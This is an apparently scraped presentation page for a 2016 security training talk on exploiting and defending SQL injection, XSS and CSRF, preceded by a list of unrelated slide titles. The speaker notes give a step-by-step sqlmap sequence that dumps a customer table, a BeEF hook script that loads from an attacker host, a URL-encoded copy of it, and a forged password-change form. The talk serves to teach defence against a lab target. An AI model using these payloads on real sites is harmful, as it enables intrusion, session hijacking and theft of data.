Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 

Steve Kosten - Exploiting common web application vulnerabilities

  • 1. Exploiting and Defending: Common Web Application Vulnerabilities
  • 2. Senior Security Consultant SANS Instructor Denver OWASP Chapter Lead Certifications CISSP, GWAPT, GSSP-Java, CISM Contact Info Steve.kosten@cypressdefense.com @skosten Introduction: Steve Kosten ©2016 – Cypress Data Defense, LLC
  • 3. Introduction A1: Injection A3: Cross-Site Scripting (XSS) A8: Cross-Site Request Forgery (CSRF) Agenda ©2016 – Cypress Data Defense, LLC
  • 4. Using real attack tools Illegal to attack targets without written contractual consent Obey all state and federal laws Cypress Data Defense assumes no liability Disclaimer ©2016 – Cypress Data Defense, LLC
  • 5. A1: Injection ©2016 – Cypress Data Defense, LLC
  • 6. Text-based attacks that exploit the syntax of the targeted interpreter. Almost any source of data can be an injection vector, including internal sources. Injection flaws occur when an application sends untrusted data to an interpreter. A1: Injection ©2016 – Cypress Data Defense, LLC
  • 7. A1: SQL Injection ©2016 – Cypress Data Defense, LLC
  • 8. XKCD ©2016 – Cypress Data Defense, LLC
  • 9. 110 million customer records Email, Mailing addresses, other Personally Identifiable Information (PII) In The News (Target) ©2016 – Cypress Data Defense, LLC
  • 10. 50 million customer records Email, DOB, Password Hashes, Challenge Questions & Answers In The News (Living Social) ©2016 – Cypress Data Defense, LLC
  • 11. 130 million credit card numbers $200 million loss In The News (Heartland) ©2016 – Cypress Data Defense, LLC
  • 12. Command Injection Inline SQL A1: Example (1) rs = statement.executeQuery( "Select EmployeeId, LastName, FirstName, PhoneNumber " + "From Employees " + "Where EmployeeId = " + request.getParameter("employeeId")) Runtime.getRuntime().exec(String.format("myTestProcess. exe %s", request.getParameter("employeeId"))) ©2016 – Cypress Data Defense, LLC
  • 13. sqlmap DEMO http://sqlmap.org/ Written in Python Exploitation DEMO ©2016 – Cypress Data Defense, LLC
  • 14. Parameterized Queries A1: Solution ©2016 – Cypress Data Defense, LLC
  • 15. XSS Cross-Site Scripting ©2016 – Cypress Data Defense, LLC
  • 16. XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper encoding. Execute scripts in the victim’s browser Hijack user sessions Deface web sites Redirect the user to malicious sites. A3: Cross-Site Scripting (XSS) ©2016 – Cypress Data Defense, LLC
  • 17. In The News (Sears) ©2016 – Cypress Data Defense, LLC
  • 18. Site defaced to contain flashing images designed to cause seizures Some victims required hospital care In The News (EF) ©2016 – Cypress Data Defense, LLC
  • 19. Primaries web site had XSS in the blog pages Payloads injected to redirect users to Hillary Clinton’s election web site In The News (Obama) ©2016 – Cypress Data Defense, LLC
  • 20. HTML Context URL Context JavaScript Context Reflected Example <td><%= request.getParameter("Name") %></td> <a href='<%= String.format("details.aspx?id=%s", request.getParameter("Name")) %>'></a> <a href='<%= String.format("javascript:redirect ('{%s}')", request.getParameter("Name")) %>'>View</a> ©2016 – Cypress Data Defense, LLC
  • 21. Browser Exploitation Framework (BeEF) http://beefproject.com/ Written in Ruby Exploitation DEMO ©2016 – Cypress Data Defense, LLC
  • 22. Encoding, encoding, encoding Validation is not the solution Contexts to consider Html, Url, JavaScript HtmlAttribute, Css, Xml, XmlAttribute Mitigations ©2016 – Cypress Data Defense, LLC
  • 23. Recommended encoding libraries OWASP Java Encoder HTTP Security Headers SourceClear Headlines X-XSS-Protection Content-Security-Policy (CSP) Mitigations (2) ©2016 – Cypress Data Defense, LLC
  • 24. CSRF Cross Site Request Forgery ©2016 – Cypress Data Defense, LLC
  • 25. Researcher earns $10,000 bug bounty CSRF vulnerability allowing attackers to: Add payment methods Modify email addresses Change security questions Add privileged users In The News ©2016 – Cypress Data Defense, LLC
  • 26. Admin console vulnerable to CSRF allowing attackers to perform the following: Modify automatic renewals Edit zone files Name server management In The News (GoDaddy) ©2016 – Cypress Data Defense, LLC
  • 27. • 2012: Multiple manufacturers • 4.5 Million Routers Compromised in Brazil In The News ©2016 – Cypress Data Defense, LLC
  • 28. A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information. Audit logs will show the user made the transaction User has no knowledge of the transaction Cross-Site Request Forgery ©2016 – Cypress Data Defense, LLC
  • 29. Multiple Authenticated Sessions Cross-Site Request Forgery (CSRF) Example ©2016 – Cypress Data Defense, LLC
  • 30. Payload on attack page Cross-Site Request Forgery (CSRF) Example (2) <form id="csrfForm" action="http://localhost:8080/csrf/content/vulnerable/changepa ssword" method="POST" > <input type="hidden" name="newPassword" value="StorageRoomB" /> <input type="hidden" name="confirmPassword" value="StorageRoomB" /> </form> ©2016 – Cypress Data Defense, LLC
  • 31. Request triggered from authenticated session Cross-Site Request Forgery (CSRF) Example (3) POST /csrf/content/vulnerable/changepassword HTTP/1.1 Host: localhost:8080 Cookie: JSESSIONID=2E7F523BE6E086F5EEB593B2B69842D2 Content-Type: application/x-www-form-urlencoded Content-Length: 53 newPassword=StorageRoomB&confirmPassword=StorageRoomB ©2016 – Cypress Data Defense, LLC
  • 32. 200 Response from web site Cross-Site Request Forgery (CSRF) Example (4) HTTP/1.1 200 OK <div class="alert alert-dismissable alert-success"> <span>Your password was successfully changed.</span> </div> ©2016 – Cypress Data Defense, LLC
  • 33. Simple Javascript Post Exploitation DEMO ©2016 – Cypress Data Defense, LLC
  • 34. CSRF Mitigations Random nonce for each request Anti-Forgery Tokens CSRF Guard (OWASP Project) Mitigations ©2016 – Cypress Data Defense, LLC
  • 35. Payload with incorrect csrf token Cross-Site Request Forgery (CSRF) Solution (1) <form id="csrfForm" action="http://localhost:8080/csrf/content/vulnerable/changepa ssword" method="POST" > <input type="hidden" name="newPassword" value="StorageRoomB" /> <input type="hidden" name="confirmPassword" value="StorageRoomB" /> <input type="hidden" name="&#95;csrf" value="103ae2a3&#45;d4d6&#45;46e9&#45;8ba6&#45; 92188ff998c2" /> </form> ©2016 – Cypress Data Defense, LLC
  • 36. Request with invalid token submitted Cross-Site Request Forgery (CSRF) Solution (2) POST /csrf/content/vulnerable/changepassword HTTP/1.1 Host: localhost:8080 Cookie: JSESSIONID=2E7F523BE6E086F5EEB593B2B69842D2 Content-Type: application/x-www-form-urlencoded Content-Length: 53 newPassword=StorageRoomB&confirmPassword=StorageRoomB&_csrf=10 3ae2a3-d4d6-46e9-8ba6-92188ff998c2 ©2016 – Cypress Data Defense, LLC
  • 37. 403 response from web site Cross-Site Request Forgery (CSRF) Example (3) HTTP/1.1 403 Forbidden <div class="alert alert-dismissable alert-danger"> <span>java.lang.NullPointerException</span> </div> ©2016 – Cypress Data Defense, LLC
  • 38. Questions? Contact Info Steve Twitter: @skosten Email: steve.kosten@cypressdefense.com Thanks for attending! ©2016 – Cypress Data Defense, LLC

Notes de l'éditeur

  1. Demo attack Quick talk about mitigation/ how you as QA can find this
  2. http://www.darkreading.com/sql-injection-attacks-haunt-retailers/d/d-id/1269576
  3. http://www.darkreading.com/privacy/livingsocial-says-cyberattack-puts-data/240153819
  4. http://www.computerworld.com/s/article/9136805/SQL_injection_attacks_led_to_Heartland_Hannaford_breaches
  5. Used to query databases, extract data, run arbitrary sql commands, upload/download files (bulk insert from [path]), and shell access (xp_commandshell) Manual Testing: Case 42 belongs to Peter Gibbons. Entering 42 or Gibbons in the name field will return results. Use burp proxy, request "http://sqli.cddexploit.net/Content/Vulnerable/InlineSql.aspx" and save the file as InlineSql.req Test For SQL Injection: sqlmap –r InlineSQL.req --dbms MSSQL View Databases: sqlmap –r InlineSQL.req --dbms MSSQL --dbs Check Database Schema sqlmap –r InlineSQL.req --dbms MSSQL -D eCommerce --tables Check Table Schema sqlmap –r InlineSQL.req --dbms MSSQL -D eCommerce -T Customers --columns Dump Table sqlmap –r InlineSQL.req --dbms MSSQL -D eCommerce -T Customers --dump Confirm Fix sqlmap –r InlineSQL.req --dbms MSSQL
  6. http://www.dailytech.com/Hackers+Assault+Epilepsy+Patients+Via+Computer/article11302.htm
  7. http://news.netcraft.com/archives/2008/04/21/hacker_redirects_barack_obamas_site_to_hillaryclintoncom.html
  8. Used to exploit XSS and run a number of attacks against the user’s browser: cookie theft, credential theft, port scans, metasploit modules, etc. Browse to xss.cddexploit.net. Reflected will put parameters in query string and payload can be dropped there. Search for Gibbons, and edit case 42. Payload can be dropped in the details field. Then, use the Persisted page to view the case details. Steps Start BEEF on the attack host Browse to your ui page from the VM (http://192.168.209.146:3000/ui/panel) and ensure the ui loads. Drop the payload ( <script src="http://192.168.209.146:3000/hook.js"></script> ) into the Status box of the vulnerable page or paste it into the querystring. To obfuscate the attack a little, use Burp and turn the hook url into a url encoded string for reflected attacks and paste it into the querystring. xss.cddexploit.net/Content/Vulnerable/Reflected.aspx?status=%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%32%30%39%2e%31%34%36%3a%33%30%30%30%2f%68%6f%6f%6b%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e%20 From the attack host, open the ui page (http://192.168.209.146:3000/ui/panel) and login (beef/beef) Open the command console, and show people around. Run a port scan (Network, Port Scanner) against 192.168.209.146 Help the user perform a google search (Misc, Google Search) Run Fake Flash Update (Social Engineering, Fake Flash Update) updating the image to 192.168.209.146 Run Pretty Theft (Social Engineering, Patty Theft) updating the image to 192.168.209.146
  9. http://www.securityweek.com/researcher-earns-10000-reporting-paypal-account-hijacking-bug
  10. http://www.securityweek.com/csrf-flaw-allowed-attackers-hijack-godaddy-domains
  11. http://www.securityweek.com/csrf-flaw-allowed-attackers-hijack-godaddy-domains